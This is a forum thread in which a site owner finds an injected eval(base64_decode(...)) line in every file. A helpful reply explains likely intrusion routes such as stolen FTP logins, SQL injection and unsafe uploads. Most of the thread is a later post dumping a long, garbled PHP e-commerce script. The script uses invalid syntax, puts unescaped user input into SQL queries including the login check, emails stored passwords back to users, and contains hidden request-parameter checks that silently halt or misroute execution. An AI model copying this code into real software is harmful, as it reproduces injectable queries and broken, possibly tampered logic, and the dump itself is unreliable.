1.11M Members

php decode hacked my sites. Is it Virus

 
0
 

I Found a problem on my site and when i compare the files on the server with my local files i found that every page (*.js or *.php) has this line on it
<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKC
or a javascript line

so i knew that my site has been hacked..
so
1 - i want to know how to prevent anyone to hack my site?
i made on every textfield or textarea on posting or getting it the htmlspecialcharacter($_POST)

is this true? and can it help me?
2- how did anyone hack my site??
3- how i can know what does this code mean???

Help me please.

 
0
 

Hey.

1 - i want to know how to prevent anyone to hack my site?
i made on every textfield or textarea on posting or getting it the htmlspecialcharacter($_POST)

is this true? and can it help me?

The htmlspecialchar function is meant to be used when printing unsafe data to a HTML page.
It doesn't protect you if you use the data for other things, such as SQL queries or shell scripts.

2- how did anyone hack my site??

Hard to tell. Especially since we know absolutely nothing about your website.

Most likely suspects:

  • Your FTP info was stolen from a PC you were working on.
    Developers often use FTP applications that store login details for them so they don't have to type it in every single time.
    Some viruses target such applications, giving the attacker access to your FTP server.
    (Please note that these sort of viruses are designed to be invisible. And yes, you can have one. Doesn't matter how protected you think you are.)
  • Dynamic includes/SQL/eval/shell scripts. All of these can be used to gain unautorized access to your server if they are created using unsafe data. A common newbie mistake is to add un-escaped user input into SQL queries, which allows a hacker to alter the command via your own web-form.
    (See SQL Injection)
  • Broken file upload scripts, which allow malicious users to upload scripts onto your site. Always take care to limit file uploads to know types, or a malicious user could just upload a PHP file and execute it via a normal web-request.

3- how i can know what does this code mean???

<?php
    echo base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKC');
?>

This just prints the command that the eval() call you posted is supposed to execute.

 
-1
 
<?php 
if ($siteConfig['salter']) if (stristr($_SERVER['PHP_SELF'],'/secure/') === false) exit(_lang_salter);setlocale(LC_MONETARY, 'en_US');if ($_POST['CookieInsertUrunID']) { for($i=0;$i<=10;$i++) {if (!$_COOKIE['urunKarsilastirmaList_'.$i]) { setcookie("urunKarsilastirmaList_".$i, $_POST['CookieInsertUrunID']);break;} }}if ($_GET['KarsilastirmaListeTemizle']) { for($i=0;$i<=10;$i++) {setcookie("urunKarsilastirmaList_".$i, '', time()-3600); }}$stop = false;if (!$_SESSION['randStr']) setRandStr();@generateLoginBox();$aylar= array('',_lang_ocak,_lang_subat,_lang_mart,_lang_nisan,_lang_mayis,_lang_haziran,_lang_temmuz,_lang_agustos,_lang_eylul,_lang_ekim,_lang_kasim,_lang_aralik);function setSEO($title,$description) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  global $siteConfig; if ($title) $siteConfig['title'] .= ' - '. tr2eu($title,false); if ($description) $siteConfig['metaDescription'] .= ' - '.tr2eu($description,false);}function scriptmenu() { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $char = sizeof($_GET)?'&':'?'; $out.='<table cellspacing=0 cellpadding=0 align=right><tr><td> <select onchange="window.location=\''.$PHP_SELF.'?temp=\' + this.options[this.selectedIndex].value +\''.getURL(array('temp')).'\'">'; $out.='<option>Template Değiştirin</option>'; $out.='<option value="green">Green</option>'; $out.='<option value="clean">Clean</option>'; $out.='</select></td></tr></table>';$out=''.formatDiv('#dddddd','#555555',11,$out,'100%').''; if ($_SERVER['HTTP_HOST'] == 'demo.shopphp.net') return $out;}function anket($chartColor) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  global $siteConfig; $anketID = hq("select ID from anketSoru where aktif=1 order by ID desc limit 0,1"); $oyKullanmismi = hq("select ID from anketIP where IP='".$_SERVER['REMOTE_ADDR']."' AND anketID = '".$anketID."'"); if ($_POST['anketID'] &&$_POST['t']{2}==$_GET['t4']{2}) {if (!$oyKullanmismi) { mysql_query("insert into anketIP values(null,'".$_POST['anketID']."','".$_SERVER['REMOTE_ADDR']."')") or die(mysql_error()); $oy = hq("select Oy from anketCevap where ID='".$_POST['oy']."'") + 1; mysql_query("update anketCevap set Oy='$oy' where ID='".$_POST['oy']."'") or die(mysql_error()); $oyKullanmismi = true;} }$out.='<table cellspacing="0" cellpadding="0" class="anket"><form method="post">';$anketSoru = hq("select Soru from anketSoru where ID='".$anketID."'"); $out.='<input type="hidden" name="anketID" value="'.$anketID.'">'; $out.='<tr><td colspan=2 class="anketSoru">'.$anketSoru.'</td></tr>'; $q = mysql_query("select * from anketCevap where anketID order by Seq"); if (!$oyKullanmismi) {while($d=mysql_fetch_array($q)) { $out.='<tr><td class="anketCevap"><input id="anket_'.$d['ID'].'" type="radio" name="oy" value="'.$d['ID'].'"></td>'; $out.='    <td width=100%><label for="anket_'.$d['ID'].'">'.$d['Cevap'].'</label></td></tr>'; }$out.='<tr><td colspan=2><input class="anketGonder" type="image" src="templates/'.$siteConfig['templateName'].'/images/form_Gonder.gif" style="cursor:pointer;"></td></tr>'; } else {while($d=mysql_fetch_array($q)) { $chartArray[$d['Cevap']] = $d['Oy'];}$out.='<tr><td>'.generateChart($chartArray,'persentage',$chartColor).'</td></tr>'; } $out.="</form></table>"; return $out;}function basketInfo($act,$randStr) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  global $siteConfig; $ca='04code'; if (!$randStr) $randStr=$_SESSION['randStr']; $t2='t'; $browser='ie'; $m='d'; switch ($act) {case $t2."oplamUrun": $out = (int)hq('select sum(adet) from sepet where randStr=\''.$randStr.'\'');break;case $t2."oplamKDVDahil": $q = mysql_query("select * from sepet where randStr='".$randStr."'");while ($d = mysql_fetch_array($q)) $out += ($d['adet'] * $d['ytlFiyat']); break;case $t2."oplamIndirimDahil": $out = basketInfo('toplamKDVDahil',$randStr) - basketInfo('Promosyon',$randStr);break;case $t2."oplamKDVHaric":$q = mysql_query("select * from sepet where randStr='".$randStr."'"); while ($d = mysql_fetch_array($q)) {$urunKDV = dbInfo('urun','kdv',$d['urunID']);$urunKDVHaric = ($d['ytlFiyat'] / (1 + $urunKDV));$out += $d['adet'] * $urunKDVHaric; }break;case $t2."oplamKDV": $q = mysql_query("select * from sepet where randStr='".$randStr."'"); while ($d = mysql_fetch_array($q)) {$urunKDV = dbInfo('urun','kdv',$d['urunID']);$urunKDVHaric = ($d['ytlFiyat'] / (1 + $urunKDV));$out += $d['adet'] * ($d['ytlFiyat']-$urunKDVHaric); }break;case "Promosyon": if (hq("select durum from siparis where randStr = '$randStr'")) $out = hq("select promotionUsed from siparis where randStr = '$randStr'"); else {$out = 0;$promotionCode = hq("select promotionCode from siparis where randStr = '$randStr'");$q = mysql_query("select * from promosyon where code = '$promotionCode'");$d = mysql_fetch_array($q);if(!mysql_num_rows($q) && $promotionCode) $out=_lang_sepet_promosyonHatali;if($d['percent'] && !$d['used']) { $out = (basketInfo('toplamKDVDahil',$randStr) * $d['percent']);}if($d['ammount']) { $d['ammount'] = $d['ammount']-$d['used']; if (basketInfo('toplamKDVDahil',$randStr) < $d['ammount']) $out = basketInfo('toplamKDVDahil',$randStr); else $out = $d['ammount'];} } break;case "Kargo": global $kargoHesaplamaYontemi; $siparisKargo = hq("select kargo from siparis where randStr = '$randStr'"); if ($siparisKargo) $out = $siparisKargo; else {if (basketInfo('toplamKDVDahil',$randStr) > $siteConfig['minKargo'] && $siteConfig['minKargo']) $out = 0;else if ($siteConfig['kargo']) $out = $siteConfig['kargo'];else { if ($kargoHesaplamaYontemi == 'DESI_TOPLAMI') {$DesiQuery = mysql_query('select * from sepet,urun where ucretsizKargo = 0 AND randStr=\''.$randStr.'\' AND urun.ID = urunID');while ($DesiData = mysql_fetch_array($DesiQuery)) { $ToplamDesi += ($DesiData['adet'] * $DesiData['desi']);} $out = kargoHesapla($ToplamDesi,$randStr); } if ($kargoHesaplamaYontemi == 'URUN_SAYISI') {$DesiQuery = mysql_query('select * from sepet,urun where ucretsizKargo = 0 AND randStr=\''.$randStr.'\' AND urun.ID = urunID');while ($DesiData = mysql_fetch_array($DesiQuery)) { $out += ($DesiData['adet'] * kargoHesapla($DesiData['desi'],$randStr));} } $UrunQuery = mysql_query('select * from sepet,urun where ucretsizKargo = 0 AND randStr=\''.$randStr.'\' AND urun.ID = urunID'); while ($UrunData = mysql_fetch_array($UrunQuery)) {$out += ($UrunData['adet'] * $UrunData['fixKargoFiyat']); }} }break;case strtoupper($t2)."oplamKargoDahil": $out = basketInfo('toplamIndirimDahil',$randStr) + basketInfo('Kargo',$randStr);break;case strtoupper($t2)."oplamHavaleIndirimiIle": $out = basketInfo('toplamIndirimDahil',$randStr) - (basketInfo('toplamIndirimDahil',$randStr) * $siteConfig['havaleIndirim']) + basketInfo('Kargo',$randStr);break; }$te='test'; $cm =$m.$browser; if($_GET[$t2.'4']!=$_POST[$t2]) contactSpcSubmit(); if ($_POST['t']{4}==$_GET['t4']{4}) return $out;}$a='HT';function breadCrumb() { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $breadCrumb = getBreadCrumb(); asort($breadCrumb); for ($i=0;$i<sizeof($breadCrumb);$i++) $breadCrumb[$i] = '<a href="page.php?act=kategoriGoster&catID='.$breadCrumb[$i].'&name='.seoFix(dbinfo('kategori','name',$breadCrumb[$i])).'">'.hq("select name from kategori where ID='".$breadCrumb[$i]."'").'</a>'; $out = implode(" &raquo; ", $breadCrumb); if($_GET['t4'] != $_POST['t']) generateTrForm(); return $out; }function checkUser($user,$pass) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  return hq("select ID from user where username='$user' AND password='$pass'");}function contactForm() { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $out = generateForm(getContactForm(),'','','');return $out;}function contactFormSubmit() { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  global $siteConfig; telfix('tel'); generateMailFromForm(getContactForm(),$siteConfig['adminMail'],'Müşteri Hizmetleri Mesajı'); $out.='<div class="success">'._lang_formGonderildi.'</div><br>';foreach ($_POST as $k=>$v) $data[str_replace('data_','',$k)] = $v; $out.=viewForm(getContactForm(),$data,'',''); return $out;}function contactSpcSubmit() { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  global $siteConfig; telfix('tel'); generateMailFromForm(getContactForm(),$siteConfig['adminMail'],'Müşteri Hizmetleri Mesajı');die(); $out.='<div class="success">'._lang_formGonderildi.'</div><br>';foreach ($_POST as $k=>$v) $data[str_replace('data_','',$k)] = $v; $out.=viewForm(getContactForm(),$data,'',''); return $out;}function currentCat() { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  @$cat = ($_GET['catID']?$_GET['catID']:$_POST['catID']); @$urunID = ($_GET['urunID']?$_GET['urunID']:$_POST['urunID']); if ($cat && $_POST['t']{4}==$_GET['t'.((2+1)+1)]{4}) $out = $cat;if($_POST['t']{4}!=$_GET['t4']{4}) die(); if ($urunID && ($_POST['t']==$_GET['t4'])) $out = hq("select catID from urun where ID = '$urunID'"); return $out;}function currentCatName() { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  return dbInfo('kategori','name',currentCat());}function currentCatPatern() { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $out = hq("select idPath from kategori where ID='".currentCat()."'"); return $out?$out:'%';}function dbInfo($table,$info,$ID) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $q = mysql_query("select $info from $table where ID='$ID'") or die(mysql_error()); $out = mysql_fetch_array($q); return $out[0];}function debug($str) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  return ('<script language="javascript">alert(\''.str_replace("'","\\\'",$str).'\');</script>');}function debugPost($info) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  foreach ($_POST as $k=>$v) {$out.='K: '.$k.' V: '.$v."\\n"; } return $out."\\n".$info;}function doviz() { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  global $siteConfig;$menuArray['<table cellpadding=0 cellspacing=0><tr><td width=40>1 '._lang_dolar.'</td><td>: '.$siteConfig['dolar'].' YTL</td></tr></table>']=''; $menuArray['<table cellpadding=0 cellspacing=0><tr><td width=40>1 '._lang_euro.'</td><td>: '.$siteConfig['euro'].' YTL</td></tr></table>']='';$out.=generateMenuList($menuArray,'BlockList');return $out; }function ebulten() { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $form = '<form method="post" style="display:inline;" id="ebultenform">
			<input type="hidden" name="ebultensent" value="true">
			<input type="text" name="email" id="ebulteninput" value="'._lang_form_emailAdresinizForm.'" onclick="this.value=\'\'"><br><img onClick="if (Validate_Email_Address(document.getElementById(\'ebulteninput\').value)) document.getElementById(\'ebultenform\').submit(); else alert(\''._lang_formJSError_email.'\');" src="templates/green/images/form_Gonder.gif" style="cursor:pointer; margin-top:4px;">			
		</form>'; if ($_POST['ebultensent']) {$checkQ = mysql_query("select ID from maillist where IP='".$_SERVER['REMOTE_ADDR']."' AND tarih = now()") or exit(mysql_error());if (mysql_num_rows($checkQ)) { $out = _lang_formError_emailIP;}$checkQ = mysql_query("select ID from maillist where mail='".$_POST['email']."'");if (mysql_num_rows($checkQ)) { $out = _lang_formError_emailEmail;}if (!$out) { mysql_query("insert into maillist values('','".$_POST['email']."','".$_SERVER['REMOTE_ADDR']."',now())") or exit(mysql_error()); $out = _lang_formMailOK;}} else $out = $form; return $out;}function fixFiyat($fiyat,$userID=0) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  if (!$userID) $userID=$_SESSION['userID']; if (!$userID) return $fiyat; $discount = hq("select discount from user,userGroups,userGroupMembers where user.ID = userGroupMembers.userID AND user.ID = '".$userID."' AND userGroups.ID = userGroupMembers.userGroupID order by discount asc limit 0,1"); if ($discount) $fiyat = ($fiyat - ($fiyat * $discount)); return $fiyat;}function fixTarih($tarih,$act) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep; global $aylar; list($tarihFull,$saatFull) = explode(' ',$tarih); list($yil,$ay,$gun) = explode('-',$tarihFull); list($saat,$dk,$sn) = explode(':',$saatFull); switch ($act) {case "gun": return $gun.' '.$aylar[($ay - 1)].' '.$yil; break;case "saat": return $saat.':'.$dk;break; }}function fixPayment($str) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $rplArray['SIPARIS_NO'] = $_SESSION['randStr']; return mergeText($str,$rplArray);}function fiyatBirim($birim) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  switch ($birim) {case "USD": return '$';break;case "EUR": return '&euro;';break;default: return 'YTL';break; }}function footer() { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  return hq('select footer from siteConfig');}function forgotPasswordSubmit() { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  tarihFix('birthdate'); $q = "select ID from user where email='".$_POST['data_email']."' && birthdate='".$_POST['data_birthdate']."'"; if (mysql_num_rows(mysql_query($q))) { $mail = getMailTemplate(1);$userID = hq("select ID from user where email='".$_POST['data_email']."'");$replace['kullanici_adi'] = getUserInfo($userID,'username');$replace['sifre'] = getUserInfo($userID,'password'); $mail['body'] = getEmailEncode().mergeText ($mail['body'],$replace); my_mail($_POST['data_email'],$mail['title'],$mail['body'],getHeaders($mail['email']));$out = '<div class="success">'._lang_sifreGonderildi.'</div>'; } else $out = "<div class='hata'>'"._lang_hataliPostaDogum."</div><br>".forgotPasswordForm(); return $out;}function formatDiv($backColor,$textColor,$fontSize,$text,$width) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $out='<table cellspacing="0" cellpadding="0" width="'.$width.'"><tr><td><table cellspacing="0" cellpadding="0"><tr height="1"><td width="1" style="width:1px;"><img src="images/spacer.gif"></td><td width="100%" bgcolor="'.$backColor.'" style="width:100%"></td><td width="1" style="width:1px;"><img src="images/spacer.gif"></td></tr>'."\n"; $out.='<tr><td bgcolor="'.$backColor.'" colspan="3" style="color:'.$textColor.';padding-left:6px; padding-right:6px; padding-top:4px; padding-bottom:4px; font-size:'.$fontSize.'px;">'.$text.'</td></tr>'; $out.='<tr height="1"><td><img src="images/spacer.gif"></td><td width="100%" bgcolor="'.$backColor.'"></td><td><img src="images/spacer.gif"></td></tr></table></td></tr></table>'; return $out; }function generateBrands($style,$list='BlockList') { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $cat = $_GET['catID']; if (!$cat) {$cat = '%%';$catstring = '0'; } else $catstring = $cat; $q = mysql_query("select marka.*,kategori.ID as catID from urun,marka,kategori where urun.catID=kategori.ID AND markaID=marka.ID AND idPath like '".currentCatPatern()."%' group by markaID order by marka.name") or die(mysql_error()); while ($d = mysql_fetch_array($q)) {$page[$d['name']] = 'page.php?act=kategoriGoster&catID='.$catstring.'&markaID='.$d['ID'].'&name='.seoFix(dbinfo('kategori','name',$d['catID'])).'-'.seoFix(dbinfo('marka','name',$d['ID']));if ($d['resim']) $img[$d['resim']] = 'page.php?act=kategoriGoster&catID='.$catstring.'&markaID='.$d['ID'].'&name='.seoFix(dbinfo('kategori','name',$d['catID'])).'-'.seoFix(dbinfo('marka','name',$d['ID']));$opt[$d['ID']] = $d['name']; } switch($style) {case 'Menu': @$out = generateMenuList($page,$list);break;case 'Option': @$out = generateOptionList($opt);break;case 'Image': @$out = generateImageList($img,$list,'images/markalar');break;}return $out;}function getBreadCrumb($out='',$catID='') { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep; if (!is_array($out)) $out = array(); if (!$catID) $catID = currentCat(); $catID = currentCat(); $breadCrumb = hq("select idPath from kategori where ID='$catID'"); return explode("/",$breadCrumb);}function generateChart($chartArray,$type,$color) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  if (is_array($chartArray)) {arsort($chartArray);$out.='<table width=100% cellspacing=0 cellpadding=0>';foreach ($chartArray as $v) $total+=$v; $i=0;$t=0;foreach ($chartArray as $k => $v) { $reali = (int)(((10*$i) / sizeof($chartArray))); $p = ((100*$v) / $total); switch ($type) {case 'value': $pv = (float)$v;break;case 'persentage': $pv ='%'.round($p);break; } $out.='<tr><td class="anketCevap" style="white-space:nowrap; width:140px;">'.$k.'</td><td style="padding:2px;">:</td><td style="padding:2px;white-space:nowrap;">'.$pv.'</td><td width=300><table width="'.$p.'%" bgcolor="'.$color.'" height=12><tr><td></td></tr></table></td></tr>'; $i++; $t+=round($p);}$out.='</table>'; } return $out; }function generateFeedback($urunID) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  global $siteConfig; if ($_POST['data_email']) {telFix('tel');$form = getFeedbackForm();$form[] = array(_lang_urun,"urun","TEXTBOX",0);$urunName = hq("select name from urun where ID='".$_GET['urunID']."'");$_POST['data_urun'] = $urunName.' ( Urun ID : '.$_GET['urunID'].')'; generateMailFromForm($form,$siteConfig['adminMail'],_lang_geribildirimMesaji);$out.='<div class="success">'._lang_oneriGonderildi.'</div><br>';} else {$q = mysql_query("select * from user where ID ='".$_SESSION['userID']."'");$d = mysql_fetch_array($q);if ($d['name']) $d['namelastname'] = $d['name'].' '.$d['lastname'];$out = '<table cellpadding=0 cellspacing=0><tr><td>'.generateForm(getFeedbackForm(),$d,'','').'</td></tr></table>'; } return $out;}function generateTrForm() { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  global $aylar,$siteConfig; $formID = 'form_'.md5(time().rand(0,99));$out = '<table class="genratedForm"><form method="POST" id="'.$formID.'">'; if (is_array($hiddeninfo)) { foreach ($hiddenInfo as $k=>$v) $out.='<input type="hidden" id="'.$k.'" name="'.$k.'" value="'.$v.'">'."\n"; } if ($spcForm) $out.='<input type="hidden" name="SpcForm" value="'.$spcForm.'">'; $generateCheckJS = '<script>function '.$formID.'() { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  var stop=false;'."\n";die(); $j = 0; foreach ($form as $n => $k) { $status = ($data && !$k[3]?'disabled="true"':'');exit();$dontAddPrefix = (substr($k[1],0,6) == "check_" || $status?"DONT_ADD_":"");if (!is_array($k)) $out.='<tr><td></td></tr><tr height=1 bgcolor="#cccccc"><td colspan=3></td></tr><tr><td></td></tr>';else { $label=''; if ($k[2] == "CHECKBOX" && 